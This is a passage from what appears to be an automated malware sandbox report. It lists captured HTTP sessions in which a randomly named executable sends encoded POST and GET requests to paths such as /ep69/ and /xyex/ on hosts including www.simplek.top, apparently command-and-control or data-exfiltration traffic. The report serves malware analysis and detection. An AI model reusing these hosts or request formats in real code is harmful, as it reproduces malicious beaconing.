                                                                                                                                                                              Data Ascii: 78=4HgsinFGTOn6eDIgkDeW2VgudT7PfoumY1YRdqtsnA/C/qK/cFV5OUqh2PvtZr3gn/9LNd/LQUYF5HTcYEKMHYpWD9Y7r5WzIsgV6awqEW8yOWtsYFvNzeBjByzgAo4qjRGn1Qp+P1mIy+Cpsf6NOpo4fAkWrFSfptCp+/GIDmXxa5q8E/g2CR8D9+D7bHmJvw==
                                                                                                                                                                              Oct 31, 2024 01:39:45.613501072 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:45 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              30192.168.2.450037203.161.49.193803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:39:47.505494118 CET727OUTPOST /ep69/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.simplek.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.simplek.top
                                                                                                                                                                              Referer: http://www.simplek.top/ep69/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 34 48 67 73 69 6e 46 47 54 4f 6e 36 4d 79 59 67 6d 6b 79 57 6a 46 67 70 44 6a 37 50 57 49 75 69 59 31 6b 52 64 72 35 38 37 6c 50 43 2f 4b 36 2f 64 45 56 35 50 55 71 68 2b 76 75 6e 45 37 33 37 6e 2f 78 74 4e 63 44 4c 51 55 4d 46 35 47 6a 63 5a 31 4b 4c 49 6f 70 55 4c 64 59 31 30 4a 57 7a 49 73 67 56 36 5a 4d 4d 45 58 55 79 50 6d 64 73 58 45 76 43 77 65 42 69 57 43 7a 67 52 34 35 43 6a 52 47 67 31 52 6c 59 50 77 69 49 79 2f 79 70 73 4f 36 4d 42 70 6f 2b 53 67 6c 53 6f 33 4c 53 6d 70 62 38 37 50 4f 31 4d 6d 50 71 57 66 6e 6d 56 4f 42 68 51 52 59 77 67 35 4b 50 57 45 62 41 30 78 2f 38 4a 74 39 36 43 32 31 7a 51 6b 73 38 4b 36 49 71 2f 45 30 3d
                                                                                                                                                                              Data Ascii: 78=4HgsinFGTOn6MyYgmkyWjFgpDj7PWIuiY1kRdr587lPC/K6/dEV5PUqh+vunE737n/xtNcDLQUMF5GjcZ1KLIopULdY10JWzIsgV6ZMMEXUyPmdsXEvCweBiWCzgR45CjRGg1RlYPwiIy/ypsO6MBpo+SglSo3LSmpb87PO1MmPqWfnmVOBhQRYwg5KPWEbA0x/8Jt96C21zQks8K6Iq/E0=
                                                                                                                                                                              Oct 31, 2024 01:39:48.200424910 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:48 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              31192.168.2.450038203.161.49.193803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:39:50.050745964 CET10809OUTPOST /ep69/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.simplek.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.simplek.top
                                                                                                                                                                              Referer: http://www.simplek.top/ep69/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 34 48 67 73 69 6e 46 47 54 4f 6e 36 4d 79 59 67 6d 6b 79 57 6a 46 67 70 44 6a 37 50 57 49 75 69 59 31 6b 52 64 72 35 38 37 6b 62 43 2f 35 43 2f 63 6e 4e 35 49 55 71 68 69 2f 75 6b 45 37 32 35 6e 2f 70 68 4e 63 50 31 51 57 30 46 37 6b 72 63 49 33 79 4c 54 59 70 55 48 39 59 30 72 35 57 63 49 73 77 52 36 5a 63 4d 45 58 55 79 50 6c 46 73 51 56 76 43 39 2b 42 6a 42 79 7a 73 41 6f 34 76 6a 52 4f 57 31 52 67 6c 4f 44 61 49 38 2f 69 70 75 38 43 4d 49 70 6f 38 52 67 6c 30 6f 33 32 53 6d 6f 7a 4b 37 4f 4b 62 4d 6b 54 71 46 75 37 35 51 2f 68 44 4e 69 77 31 34 34 2b 38 59 7a 7a 36 37 54 58 35 50 4d 64 63 51 31 56 4e 62 48 5a 7a 52 4b 30 37 69 30 62 4e 6d 64 35 77 62 69 63 6d 31 73 50 51 70 4d 69 65 64 49 6e 4c 4d 65 37 65 5a 31 6f 54 61 4c 4c 50 7a 2b 58 32 49 79 72 34 39 4d 4d 30 4a 67 36 57 6d 35 76 42 6d 32 62 65 56 45 74 32 35 69 66 65 35 79 6e 63 50 4c 70 41 69 39 66 6c 72 63 32 65 46 33 6e 75 73 49 38 45 66 42 57 62 38 62 67 75 2b 55 6a 66 69 63 62 4d 78 44 61 74 4d 76 46 57 69 54 49 4d 69 55 78 [TRUNCATED]
                                                                                                                                                                              Data Ascii: 78=4HgsinFGTOn6MyYgmkyWjFgpDj7PWIuiY1kRdr587kbC/5C/cnN5IUqhi/ukE725n/phNcP1QW0F7krcI3yLTYpUH9Y0r5WcIswR6ZcMEXUyPlFsQVvC9+BjByzsAo4vjROW1RglODaI8/ipu8CMIpo8Rgl0o32SmozK7OKbMkTqFu75Q/hDNiw144+8Yzz67TX5PMdcQ1VNbHZzRK07i0bNmd5wbicm1sPQpMiedInLMe7eZ1oTaLLPz+X2Iyr49MM0Jg6Wm5vBm2beVEt25ife5yncPLpAi9flrc2eF3nusI8EfBWb8bgu+UjficbMxDatMvFWiTIMiUxqESqrvgzoF3V2u1A4buPviEYt+QZjVLbM5iD6MgsJRAR5c29RHgMEioZIhWU8FeLQ02Z6I0AZApXQUyAGbx5uR3p1GorjuCSZlOvrEnjP0RiafbjirsgpyUvOotDhHJwivQYGer0l/3taHe6RyZyhcRclPqK4EdS72LgFtjIwHarNDd9LL8NjVPvret+hIpGV5CqSALs4MMkGl0OvEKkELQhsvqW66oIxl5921O4HGWxFUWPuV8Pdv533IMx0a6Wpo+oYSH5G/ccIwnYs16wD0DgitQSMpRpwhJYKTlI4os6jmKFRA1b09G7CVdaYDI/vkATiuFwlqFb+z5F51fe3ztw7GKP20/A3EAT5vvLTSIwUezzxoboRn7o54YC8T3fTMrtajqDCxEtad1x8+MDacuE00xcnC2oyCy8OGGCHAjcZI3nEGkTZfvlVuRUbQucUIyjQOyXu4EvpL1+0HVbS+3AUM63O+5128dDsreTNUnDB6bR6RAO9/+Cj8IDZYqIve2OH5a5t5Rt0rVJdrCV/0y9UbxV4Vf8UBwsJ4nGOXq3aeyGpY4a54ybb5kj28/x8vw+I2kDBxHwm010NOwhI6jIYcJXHi1xPJAOaiaq/70xS1B6UUEJzdqCwIL8cbHv2btyUNxp90VkbEKsi38ilJuwnwVCykZCtg [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:39:50.722810984 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:50 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              32192.168.2.450039203.161.49.193803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:39:52.597141981 CET450OUTGET /ep69/?78=1FIMhSJhU8+lHAAmrS+FlWYlLXz7aIiZYVZCfaZw4D7e7Ym+VFULEmTMy/HAB+T+rsRxHszMTzww+hC5XQWyLoZ+L/5l/vKoQeg/i8EmIWt3MnVCcXzM6O0=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.simplek.top
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 31, 2024 01:39:53.275543928 CET548INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:53 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              33192.168.2.450040199.59.243.227803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:39:58.421084881 CET704OUTPOST /xyex/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.297676.com
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.297676.com
                                                                                                                                                                              Referer: http://www.297676.com/xyex/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 4c 54 48 63 6a 68 77 74 53 61 48 65 74 62 74 4e 33 4f 42 35 79 62 68 70 47 42 2f 31 66 73 78 45 46 7a 6b 2b 57 66 6b 71 71 62 33 75 39 4c 37 4e 62 73 4d 73 52 75 34 7a 34 68 75 72 39 59 33 4f 43 43 77 47 61 70 65 6d 79 42 79 52 49 30 76 69 70 68 57 68 39 46 77 37 6c 58 67 4d 63 6e 31 50 52 32 55 78 32 33 76 2f 7a 2b 31 49 2f 49 55 31 41 6f 6f 31 34 52 47 54 65 35 78 2b 69 77 45 73 50 2b 66 66 4f 67 67 58 73 6a 53 6a 4d 4d 4a 63 4f 56 41 4d 43 61 4d 4a 52 59 46 4a 54 75 39 48 69 50 73 4a 6e 43 34 76 37 63 78 34 50 62 4f 6c 68 45 38 76 6b 31 4c 61 47 54 64 6a 6d 61 57 63 75 77 3d 3d
                                                                                                                                                                              Data Ascii: 78=LTHcjhwtSaHetbtN3OB5ybhpGB/1fsxEFzk+Wfkqqb3u9L7NbsMsRu4z4hur9Y3OCCwGapemyByRI0viphWh9Fw7lXgMcn1PR2Ux23v/z+1I/IU1Aoo14RGTe5x+iwEsP+ffOggXsjSjMMJcOVAMCaMJRYFJTu9HiPsJnC4v7cx4PbOlhE8vk1LaGTdjmaWcuw==
                                                                                                                                                                              Oct 31, 2024 01:39:59.066325903 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:39:58 GMT
                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                              content-length: 1110
                                                                                                                                                                              x-request-id: a00cf52a-db1a-4792-96e8-c5355dcf4b75
                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==
                                                                                                                                                                              set-cookie: parking_session=a00cf52a-db1a-4792-96e8-c5355dcf4b75; expires=Thu, 31 Oct 2024 00:54:58 GMT; path=/
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 76 4d 6b 64 37 30 70 63 61 61 2b 2b 78 50 48 50 45 54 37 6b 38 48 53 39 6f 50 76 75 76 55 41 2b 63 6b 46 55 2b 67 72 44 45 56 73 38 31 73 54 36 49 58 73 71 51 61 59 4d 55 6a 66 50 4f 6d 4e 4c 48 39 44 71 65 56 47 31 6a 64 75 47 39 54 4b 43 33 4e 68 44 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                                              Oct 31, 2024 01:39:59.066339970 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTAwY2Y1MmEtZGIxYS00NzkyLTk2ZTgtYzUzNTVkY2Y0Yjc1IiwicGFnZV90aW1lIjoxNzMwMzM1MT


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              34192.168.2.450041199.59.243.227803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:40:00.955265045 CET724OUTPOST /xyex/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.297676.com
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.297676.com
                                                                                                                                                                              Referer: http://www.297676.com/xyex/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 4c 54 48 63 6a 68 77 74 53 61 48 65 38 4c 39 4e 31 76 42 35 36 62 68 71 4b 68 2f 31 52 4d 78 66 46 7a 67 2b 57 64 49 36 72 70 54 75 36 70 6a 4e 61 74 4d 73 45 75 34 7a 67 52 75 75 67 6f 33 46 43 44 4e 7a 61 6f 69 6d 79 42 6d 52 49 30 66 69 70 79 2b 67 39 56 77 35 74 33 67 43 54 48 31 50 52 32 55 78 32 33 54 52 7a 2f 64 49 2f 35 6b 31 47 39 63 32 31 78 47 63 5a 35 78 2b 6d 77 45 6f 50 2b 66 78 4f 68 38 39 73 68 61 6a 4d 4a 6c 63 4f 41 73 50 4a 61 4d 31 4f 6f 45 39 54 74 41 4e 74 74 46 61 6e 7a 59 32 30 2b 49 65 44 39 44 2f 77 31 64 34 32 31 76 70 62 55 55 58 72 5a 72 56 31 38 7a 51 56 46 35 78 6b 69 51 54 78 42 4e 52 2b 66 32 35 36 64 38 3d
                                                                                                                                                                              Data Ascii: 78=LTHcjhwtSaHe8L9N1vB56bhqKh/1RMxfFzg+WdI6rpTu6pjNatMsEu4zgRuugo3FCDNzaoimyBmRI0fipy+g9Vw5t3gCTH1PR2Ux23TRz/dI/5k1G9c21xGcZ5x+mwEoP+fxOh89shajMJlcOAsPJaM1OoE9TtANttFanzY20+IeD9D/w1d421vpbUUXrZrV18zQVF5xkiQTxBNR+f256d8=
                                                                                                                                                                              Oct 31, 2024 01:40:01.570861101 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:40:00 GMT
                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                              content-length: 1110
                                                                                                                                                                              x-request-id: da303aa3-86e7-4589-b17c-e8d56ec0f5a5
                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==
                                                                                                                                                                              set-cookie: parking_session=da303aa3-86e7-4589-b17c-e8d56ec0f5a5; expires=Thu, 31 Oct 2024 00:55:01 GMT; path=/
                                                                                                                                                                              connection: close
